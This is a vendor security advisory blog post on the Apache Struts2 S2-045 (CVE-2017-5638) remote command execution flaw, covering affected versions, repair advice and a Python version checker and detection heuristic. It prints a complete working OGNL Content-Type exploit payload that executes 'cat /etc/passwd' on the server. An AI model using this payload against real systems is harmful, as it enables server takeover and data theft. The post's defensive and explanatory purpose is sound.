Posted by Charlene (Assistant Engineer)

Alibaba Cloud helps cloud users cope with Struts2 high-risk vulnerabilities

Posted: Apr 6, 2017 15:09
On March 6, 2017, a remote command execution vulnerability was disclosed in Apache Struts2, tracked as S2-045 and assigned CVE-2017-5638. The vulnerability is officially rated high-risk. When the Jakarta-based file upload (multipart parser) is in use, an attacker can modify the Content-Type value in the HTTP request header to trigger the vulnerability and execute arbitrary system commands on the server.
After rating the vulnerability and confirming the scope of its impact, the Alibaba Cloud Security Emergency team immediately launched emergency measures, analyzed the root cause of the vulnerability, and issued an official security vulnerability warning.
Coordinated response, zero security incidents
Once the emergency measures started, every Alibaba Cloud Security department responded to help users deal with the Struts2 vulnerability. Alibaba Security Server Guard quickly scanned cloud ECS instances. Situation Awareness used its behavior detection functions to accurately capture the IP addresses of attack sources. The Web Application Firewall upgraded its protection rules the next morning, helping users effectively block attacks that exploit the vulnerability.
Through timely detection, notification and rule upgrades, no Alibaba Cloud Security user was affected by the vulnerability.
Vulnerability analysis
0×00 Vulnerability announcement
According to the official vulnerability announcement,
https://cwiki.apache.org/confluence/display/WW/S2-045
the main cause of the vulnerability lies in the handling of the Content-Type header:
"It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user."
The remote command is executed by injecting an OGNL statement into the Content-Type field of the HTTP headers.
The flaw lies in how Struts2 handles this exception.
0×01 Impact scope
Affected versions: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
0×02 Hazards
• Testing environment: Tomcat 7, Struts 2.3.16
• Testing procedure: intercept the request packets on the upload page
 
Add a Content-Type key to the HTTP header, with the PoC as its value:
%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat  /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=newjava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
[Figure: Distribution of global attacks]
Repair advice
• For the Jakarta-based multipart parser used for file uploads, the detection method is to check the version of struts-core.x.x.jar under the web directory “/WEB-INF/lib/”. If the version is between Struts 2.3.5 and 2.3.31 or between Struts 2.5 and 2.5.10, the application is vulnerable. Update to Struts version 2.3.32 or 2.5.10.1.
• Switch to a multipart parser that implements file upload by another method (not the Jakarta-based one).
• Use a third-party protective device for protection.
• Delete the commons-fileupload-x.x.x.jar file (which will disable the upload function).
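As an added defender-side example (not code from the original post), the Python below automates the jar version check from the first repair item and adds a simple detection heuristic for the malicious Content-Type described in the analysis. It assumes the Struts core jar follows the Maven naming convention struts2-core-<version>.jar; the function names are the example's own.

```python
"""Defender-side checks for S2-045 (CVE-2017-5638).

Added example, not code from the original post. Assumption: the Struts
core jar follows the Maven naming convention struts2-core-<version>.jar.
"""
import glob
import os
import re

# Affected ranges from the advisory (inclusive): 2.3.5-2.3.31, 2.5-2.5.10.
AFFECTED_RANGES = [((2, 3, 5), (2, 3, 31)), ((2, 5), (2, 5, 10))]
JAR_RE = re.compile(r"^struts2-core-(\d+(?:\.\d+)*)\.jar$")
# OGNL expression openers; a legitimate multipart Content-Type has none.
OGNL_RE = re.compile(r"[%$]\{")


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1); tuple ordering matches release order."""
    return tuple(int(part) for part in text.split("."))


def is_vulnerable_version(version):
    """True when the version falls inside an affected range. Tuple
    comparison handles patch releases: (2, 5, 10, 1) > (2, 5, 10), so the
    fixed 2.5.10.1 is not flagged while 2.5.10 is."""
    v = parse_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def check_jar_names(names):
    """Return (path, version, vulnerable) for every Struts core jar found."""
    results = []
    for name in names:
        match = JAR_RE.match(os.path.basename(name))
        if match:
            version = match.group(1)
            results.append((name, version, is_vulnerable_version(version)))
    return results


def scan_lib_dir(lib_dir):
    """Apply the jar check to a deployed webapp's WEB-INF/lib directory."""
    return check_jar_names(sorted(glob.glob(os.path.join(lib_dir, "*.jar"))))


def content_type_is_suspicious(header_value):
    """Detection heuristic: flag a Content-Type carrying an OGNL opener."""
    return bool(OGNL_RE.search(header_value))
```

Run `scan_lib_dir("/path/to/webapp/WEB-INF/lib")` against a deployed application to list any Struts core jar with its version and whether it falls in the affected ranges.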